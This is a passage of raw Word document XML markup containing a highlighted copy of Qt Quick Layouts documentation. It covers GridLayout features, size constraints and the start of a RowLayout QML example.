        <w:r w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>GridLayout</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>adds</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> these features:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1687" w:anchor="row-attached-prop" w:history="1">
        <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Grid coordinates</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can be specified with the</w:t>
      </w:r>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1688" w:anchor="row-attached-prop" w:history="1">
        <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Layout.row</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and</w:t>
      </w:r>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1689" w:anchor="column-attached-prop" w:history="1">
        <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Layout.column</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1690" w:anchor="flow-prop" w:history="1">
        <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Automatic grid coordinates</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used together with the</w:t>
      </w:r>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1691" w:anchor="flow-prop" w:history="1">
        <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>flow</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1692" w:anchor="rows-prop" w:history="1">
        <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>rows</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and</w:t>
      </w:r>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1693" w:anchor="columns-prop" w:history="1">
        <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>columns</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properties.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00490E7E" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId1694" w:anchor="columnSpan-attached-prop" w:history="1">
        <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="FF0000"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Spans</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across rows or columns can be specified with the</w:t>
      </w:r>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1695" w:anchor="rowSpan-attached-prop" w:history="1">
        <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Layout.rowSpan</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and</w:t>
      </w:r>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1696" w:anchor="columnSpan-attached-prop" w:history="1">
        <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Layout.columnSpan</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00C570D9" w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>properties.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9" w:rsidP="008F1DE7">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1393" w:name="size-constraints"/>
      <w:bookmarkStart w:id="1394" w:name="_Toc483000829"/>
      <w:bookmarkStart w:id="1395" w:name="_Toc483003822"/>
      <w:bookmarkStart w:id="1396" w:name="_Toc483604175"/>
      <w:bookmarkStart w:id="1397" w:name="_Toc483605395"/>
      <w:bookmarkEnd w:id="1393"/>
      <w:r w:rsidRPr="008F1DE7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Size Constraints</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1394"/>
      <w:bookmarkEnd w:id="1395"/>
      <w:bookmarkEnd w:id="1396"/>
      <w:bookmarkEnd w:id="1397"/>
    </w:p>
    <w:p w:rsidR="00C570D9" w:rsidRPr="00C570D9" w:rsidRDefault="00C570D9" w:rsidP="00C570D9">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Since an item can be resized by its layout, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00561FD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>layout needs to know the</w:t>
      </w:r>
      <w:r w:rsidRPr="00561FD8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1697" w:anchor="minimumWidth-attached-prop" w:history="1">
        <w:r w:rsidRPr="00561FD8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>minimum</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00561FD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00561FD8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1698" w:anchor="preferredWidth-attached-prop" w:history="1">
        <w:r w:rsidRPr="00561FD8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>preferred</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00561FD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and</w:t>
      </w:r>
      <w:r w:rsidRPr="00561FD8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1699" w:anchor="maximumWidth-attached-prop" w:history="1">
        <w:r w:rsidRPr="00561FD8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>maximum</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00561FD8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00561FD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sizes</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of all items </w:t>
      </w:r>
      <w:r w:rsidRPr="00561FD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>where</w:t>
      </w:r>
      <w:r w:rsidRPr="00561FD8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1700" w:anchor="fillWidth-attached-prop" w:history="1">
        <w:r w:rsidRPr="00561FD8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Layout.fillWidth</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00561FD8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00561FD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r w:rsidRPr="00561FD8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId1701" w:anchor="fillHeight-attached-prop" w:history="1">
        <w:r w:rsidRPr="00561FD8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Layout.fillHeight</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00561FD8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00561FD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is set to</w:t>
      </w:r>
      <w:r w:rsidRPr="00561FD8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00561FD8">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. For </w:t>
      </w:r>
      <w:r w:rsidRPr="00561FD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>instance</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, the following will produce a layout with two rectangles lying side-by-side that stretches horizontally. The azure rectangle can be resized from 50x150 to 300x150, and the plum rectangle can be resized from 100x100 to ∞x100.</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typ"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="4F9D08"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RowLayout</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w: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id</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layout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anchors</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fill</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parent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spacing</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6</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Rectangle</w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C570D9">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w: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color</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str"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="AAAAAA"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'azure'</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fillWidth</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kwd"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</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minimumWidth</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>50</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preferredWidth</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lit"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF55FF"/>
